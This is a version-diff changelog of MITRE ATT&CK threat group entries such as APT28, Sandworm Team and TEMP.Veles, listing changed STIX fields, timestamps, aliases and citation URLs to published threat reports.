external_references[9]['source_name']CrowdStrike Grim Spider May 2019CrowdStrike Wizard Spider October 2020
external_references[9]['description']John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.
external_references[9]['url']https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/https://www.crowdstrike.com/blog/wizard-spider-adversary-update/
x_mitre_version2.02.1

[G0128] ZIRCONIUM

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 21:00:44.930000+00:002023-03-22 22:10:43.732000+00:00
x_mitre_version1.01.1
Patches

[G0007] APT28

Current version: 4.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
external_referenceshttps://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50
external_referenceshttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_referenceshttps://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
values_changed
STIX FieldOld valueNew Value
modified2022-03-16 18:08:13.958000+00:002023-03-26 17:51:20.401000+00:00
external_references[1]['source_name']APT28SNAKEMACKEREL
external_references[1]['description'](Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: Accenture SNAKEMACKEREL Nov 2018)
external_references[2]['source_name']IRON TWILIGHTFancy Bear
external_references[2]['description'](Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[3]['source_name']SNAKEMACKERELTsar Team
external_references[3]['description'](Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[4]['source_name']SwallowtailAPT28
external_references[4]['description'](Citation: Symantec APT28 Oct 2018)(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[5]['source_name']Group 74STRONTIUM
external_references[5]['description'](Citation: Talos Seduploader Oct 2017)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[6]['source_name']SednitIRON TWILIGHT
external_references[6]['description']This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
external_references[7]['source_name']SofacyThreat Group-4127
external_references[7]['description']This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: SecureWorks TG-4127)
external_references[8]['source_name']Pawn StormTG-4127
external_references[8]['description'](Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) (Citation: SecureWorks TG-4127)
external_references[9]['source_name']Fancy BearPawn Storm
external_references[9]['description'](Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[10]['source_name']STRONTIUMSwallowtail
external_references[10]['description'](Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: Symantec APT28 Oct 2018)
external_references[11]['source_name']Tsar TeamGroup 74
external_references[11]['description'](Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[12]['source_name']Threat Group-4127Accenture SNAKEMACKEREL Nov 2018
external_references[12]['description'](Citation: SecureWorks TG-4127)Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
external_references[13]['source_name']TG-4127Crowdstrike DNC June 2016
external_references[13]['description'](Citation: SecureWorks TG-4127)Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[14]['source_name']NSA/FBI Drovorub August 2020US District Court Indictment GRU Oct 2018
external_references[14]['description']NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[14]['url']https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDFhttps://www.justice.gov/opa/page/file/1098481/download
external_references[15]['source_name']Cybersecurity Advisory GRU Brute Force Campaign July 2021GRIZZLY STEPPE JAR
external_references[15]['description']NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[15]['url']https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDFhttps://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[16]['source_name']DOJ GRU Indictment Jul 2018ESET Zebrocy May 2019
external_references[16]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[16]['url']https://www.justice.gov/file/1080281/downloadhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[17]['source_name']Ars Technica GRU indictment Jul 2018ESET Sednit Part 3
external_references[17]['description']Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[17]['url']https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[18]['source_name']Crowdstrike DNC June 2016Sofacy DealersChoice
external_references[18]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[18]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[19]['source_name']FireEye APT28FireEye APT28 January 2017
external_references[19]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[19]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[20]['source_name']SecureWorks TG-4127FireEye APT28
external_references[20]['description']SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[20]['url']https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaignhttps://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[21]['source_name']FireEye APT28 January 2017Ars Technica GRU indictment Jul 2018
external_references[21]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[21]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[22]['source_name']GRIZZLY STEPPE JARTrendMicro Pawn Storm Dec 2020
external_references[22]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
external_references[22]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html
external_references[23]['source_name']Sofacy DealersChoiceSecurelist Sofacy Feb 2018
external_references[23]['description']Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[23]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[24]['source_name']Palo Alto Sofacy 06-2018Kaspersky Sofacy
external_references[24]['description']Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[24]['url']https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[25]['source_name']Symantec APT28 Oct 2018Palo Alto Sofacy 06-2018
external_references[25]['description']Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[25]['url']https://www.symantec.com/blogs/election-security/apt28-espionage-military-governmenthttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[26]['source_name']ESET Zebrocy May 2019Talos Seduploader Oct 2017
external_references[26]['description']ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[26]['url']https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[27]['source_name']US District Court Indictment GRU Oct 2018Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020
external_references[27]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.
external_references[27]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/
external_references[28]['source_name']Kaspersky SofacyMicrosoft STRONTIUM Aug 2019
external_references[28]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
external_references[28]['url']https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
external_references[29]['source_name']ESET Sednit Part 3DOJ GRU Indictment Jul 2018
external_references[29]['description']ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[29]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdfhttps://www.justice.gov/file/1080281/download
external_references[30]['source_name']Talos Seduploader Oct 2017Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[30]['description']Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[30]['url']https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.htmlhttps://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[31]['source_name']Securelist Sofacy Feb 2018NSA/FBI Drovorub August 2020
external_references[31]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
external_references[31]['url']https://securelist.com/a-slice-of-2017-sofacy-activity/83930/https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
external_references[32]['source_name']Secureworks IRON TWILIGHT ProfileSecureWorks TG-4127
external_references[32]['description']Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[32]['url']https://www.secureworks.com/research/threat-profiles/iron-twilighthttps://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[34]['source_name']Accenture SNAKEMACKEREL Nov 2018Secureworks IRON TWILIGHT Profile
external_references[34]['description']Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
external_references[34]['url']https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50https://www.secureworks.com/research/threat-profiles/iron-twilight
external_references[35]['source_name']TrendMicro Pawn Storm Dec 2020Symantec APT28 Oct 2018
external_references[35]['description']Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[35]['url']https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htmlhttps://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[36]['source_name']Microsoft STRONTIUM Aug 2019Sednit
external_references[36]['description']MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[37]['source_name']Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020Sofacy
external_references[37]['description']Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)

[G0064] APT33

Current version: 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-23 21:22:08.170000+00:002023-03-08 22:07:25.123000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[G0138] Andariel

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 16:27:11.471000+00:002022-11-30 22:51:40.270000+00:00
external_references[3]['url']http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdfhttp://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf
x_mitre_attack_spec_version2.1.03.1.0

[G0001] Axiom

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 15:52:00.359000+00:002023-03-20 22:03:44.661000+00:00
external_references[5]['url']http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdfhttps://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
external_references[6]['url']http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdfhttps://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version2.1.03.1.0

[G0035] Dragonfly

Current version: 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 22:09:02.443000+00:002023-03-08 22:03:28.170000+00:00
x_mitre_attack_spec_version2.1.03.1.0

[G0085] FIN4

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-08-11 20:45:59.687000+00:002023-02-01 21:27:44.778000+00:00
external_references[2]['source_name']FireEye Hacking FIN4 Dec 2014FireEye FIN4 Stealing Insider NOV 2014
external_references[2]['description']Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.
external_references[2]['url']https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.htmlhttps://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html
external_references[3]['source_name']FireEye FIN4 Stealing Insider NOV 2014FireEye Hacking FIN4 Video Dec 2014
external_references[3]['description']Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.htmlhttps://www2.fireeye.com/WBNR-14Q4NAMFIN4.html
external_references[4]['source_name']FireEye Hacking FIN4 Video Dec 2014FireEye Hacking FIN4 Dec 2014
external_references[4]['description']Vengerik, B. & Dennesen, K.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved January 15, 2019.Vengerik, B. et al.. (2014, December 5). Hacking the Street? FIN4 Likely Playing the Market. Retrieved December 17, 2018.
external_references[4]['url']https://www2.fireeye.com/WBNR-14Q4NAMFIN4.htmlhttps://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

[G0094] Kimsuky

Current version: 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 16:28:34.698000+00:002022-11-30 22:53:00.875000+00:00
external_references[6]['url']https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdfhttps://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf
x_mitre_attack_spec_version2.1.03.1.0

[G0088] TEMP.Veles

Current version: 1.3

Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/
values_changed
STIX FieldOld valueNew Value
modified2022-05-24 16:22:20.856000+00:002022-11-30 22:46:40.135000+00:00
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
external_references[4]['source_name']FireEye TEMP.Veles 2018 FireEye TRITON 2019
external_references[4]['description']FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.
external_references[4]['url']https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.htmlhttps://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html
external_references[5]['source_name']FireEye TRITON 2019FireEye TEMP.Veles JSON April 2019
external_references[5]['description']Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019.Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.htmlhttps://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html
external_references[6]['source_name']FireEye TEMP.Veles JSON April 2019Pylos Xenotime 2019
external_references[6]['description']Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.
external_references[6]['url']https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.htmlhttps://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/
external_references[7]['source_name']Pylos Xenotime 2019XENOTIME
external_references[7]['description']Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)
x_mitre_attack_spec_version2.1.03.1.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'XENOTIME', 'description': 'The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609) .(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018 )'}

[G0044] Winnti Group

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 16:27:20.897000+00:002023-03-20 22:02:53.982000+00:00
external_references[6]['url']http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdfhttps://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
x_mitre_attack_spec_version2.1.03.1.0

[G0045] menuPass

Current version: 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-20 20:07:40.169000+00:002023-03-23 15:06:31.019000+00:00
external_references[9]['url']https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdfhttp://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf
x_mitre_attack_spec_version2.1.03.1.0

mobile-attack

Major Version Changes

[G0034] Sandworm Team

Current version: 3.0

Version changed from: 2.2 → 3.0

Details
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.justice.gov/opa/page/file/1098481/download
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 20:11:40.313000+00:002023-03-08 22:12:31.238000+00:00
external_references[5]['source_name']BlackEnergy (Group)IRIDIUM
external_references[5]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: Microsoft Prestige ransomware October 2022)
external_references[6]['source_name']TelebotsBlackEnergy (Group)
external_references[6]['description'](Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[7]['source_name']IRON VIKINGTelebots
external_references[7]['description'](Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[8]['source_name']US District Court Indictment GRU Oct 2018IRON VIKING
external_references[8]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)
external_references[9]['source_name']Dragos ELECTRUMUS District Court Indictment GRU Oct 2018
external_references[9]['description']Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[9]['url']https://www.dragos.com/resource/electrum/https://www.justice.gov/opa/page/file/1098481/download
external_references[10]['source_name']F-Secure BlackEnergy 2014Dragos ELECTRUM
external_references[10]['description']F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.
external_references[10]['url']https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdfhttps://www.dragos.com/resource/electrum/
external_references[11]['source_name']iSIGHT Sandworm 2014F-Secure BlackEnergy 2014
external_references[11]['description']Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.
external_references[11]['url']https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.htmlhttps://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
external_references[12]['source_name']CrowdStrike VOODOO BEARiSIGHT Sandworm 2014
external_references[12]['description']Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.
